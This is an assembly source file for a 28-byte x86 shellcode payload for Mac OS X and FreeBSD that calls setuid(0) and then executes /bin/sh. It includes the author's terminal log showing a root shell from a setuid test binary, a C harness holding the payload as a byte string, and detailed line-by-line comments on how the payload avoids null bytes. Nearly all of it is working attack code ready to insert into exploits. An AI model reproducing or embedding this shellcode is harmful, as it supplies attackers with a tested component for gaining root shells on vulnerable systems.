; Shellcode-Desc .: setuid(0) + execve() of /bin/sh
; Shellcode-Size .: 28 bytes
; Shellcode-Id ...: 8a46e92e51db66046f4dd151f4b87ba6
; Shellcode-Arch .: x86
; Nasm-Version ...: NASM version 0.98.40 (Apple Computer, Inc. build 9) compiled on Apr  6 2006
; Ndisasm-Version : NDISASM version 0.98.40 (Apple Computer, Inc. build 9) compiled Apr  6 2006
; Tested-OSs .....: Mac OS X 10.4.x , FreeBSD 5.5-STABLE
;
; RageMan <rageman@olografix.org>
;         <rageman@s0ftpj.org>
;
; Eva:~/shellcodes rageman$ nasm execve-0x04.asm -fmacho
; Eva:~/shellcodes rageman$ ld -o execve-0x04 execve-0x04.o 
; Eva:~/shellcodes rageman$ sudo chmod 4777 execve-0x04
; Eva:~/shellcodes rageman$ sudo chown root execve-0x04
; Eva:~/shellcodes rageman$ ./execve-0x04 
; Eva:/Users/rageman/shellcodes root# id
; uid=0(root) gid=501(rageman) groups=501(rageman), 81(appserveradm), 79(appserverusr), 80(admin)
; Eva:/Users/rageman/shellcodes root# exit
; exit
; Eva:~/shellcodes rageman$ gcc -w -o -O1 execve-0x04 execve-0x04.c 
; Eva:~/shellcodes rageman$ sudo chmod 4777 execve-0x04
; Eva:~/shellcodes rageman$ sudo chown root execve-0x04
; Eva:~/shellcodes rageman$ ./execve-0x04
; Eva:/Users/rageman/shellcodes root# id
; uid=0(root) gid=501(rageman) groups=501(rageman), 81(appserveradm), 79(appserverusr), 80(admin)
; Eva:/Users/rageman/shellcodes root# exit
;
; <---execve-0x04.c-->
; char shellcode[] =
;        "\x99\x52\x52\xb0\x17\xcd\x80\x68"
;        "\x2f\x2f\x73\x68\x68\x2f\x62\x69"
;        "\x6e\x89\xe3\x52\x54\x54\x53\x52"
;        "\xb0\x3b\xcd\x80";
;
; int main()
; {
;         void (*fp)() = shellcode;
;         fp();
; }
; <-/-execve-0x04.c-->

; Assembler/target declaration: 32-bit x86, NASM (Intel syntax),
; BSD-style int 0x80 system calls (FreeBSD / Mac OS X per the header).
BITS 32

; Export the entry point. The leading underscore is the Mach-O symbol
; convention used by the `nasm -fmacho` / `ld` build shown in the header.
GLOBAL _main

;-----------------------------------------------------------------------
; _main — setuid(0) followed by execve("/bin//sh", argv, envp)
; Target: 32-bit x86, NASM Intel syntax; BSD-style int 0x80 syscalls:
;         syscall number in eax, arguments on the stack, and [esp]
;         holding a dummy slot where the kernel expects the return
;         address a libc wrapper would have pushed.
; In:     assumes eax is non-negative with its upper 24 bits zero on
;         entry — `cdq` and the two `mov al, ...` rely on that (the C
;         harness in the header does not guarantee it).
; Out:    does not return on success; neither syscall result is checked,
;         so execve is attempted even if setuid(0) failed.
; Stack:  the path string and both argument vectors are built in place
;         on the stack; the resulting call is
;         execve("/bin//sh", {"", NULL}, {NULL}).
; Note (analysis): the doubled slash fills the path into exactly two
;         dwords without an embedded NUL byte; the empty argv[0] and the
;         empty environment are distinguishing artifacts of this payload.
;-----------------------------------------------------------------------
_main:
                       ; --- setuid(0) ---
cdq                    ; edx = sign of eax -> 0 (assumes eax >= 0); reused as uid 0 and as NULL below
push edx               ; arg0: uid_t 0
push edx               ; dummy return-address slot for int 0x80; also becomes the NUL terminator of the string pushed below
mov  al, 0x17          ; eax = SYS_setuid (0x17); only the low byte is written
int  0x80              ; setuid(0); eax = 0 on success, errno on failure (unchecked)

                       ; --- build "/bin//sh\0" on the stack (little-endian; lower address = earlier bytes) ---
push 0x68732f2f        ; "//sh" (bytes 2f 2f 73 68), immediately below the zero dword pushed above
push 0x6e69622f        ; "/bin" (bytes 2f 62 69 6e)
mov  ebx, esp          ; ebx = &"/bin//sh" (path), kept across the pushes below

                       ; --- execve(path, argv, envp): arguments pushed right to left ---
push edx               ; NULL: terminator shared by envp[] and argv[] (assumes edx is still 0 after the setuid call)
push esp               ; envp = address of that NULL (push esp stores the pre-push value) -> envp = {NULL}
push esp               ; argv = address of the envp slot -> argv[0] points at the NULL dword (""), argv[1] = NULL
push ebx               ; path = "/bin//sh"
push edx               ; dummy return-address slot for int 0x80
mov  al, 0x3b          ; eax = SYS_execve (0x3b); upper bytes of eax are 0 after setuid returned
int  0x80              ; execve(); on success the process image is replaced and this code never returns
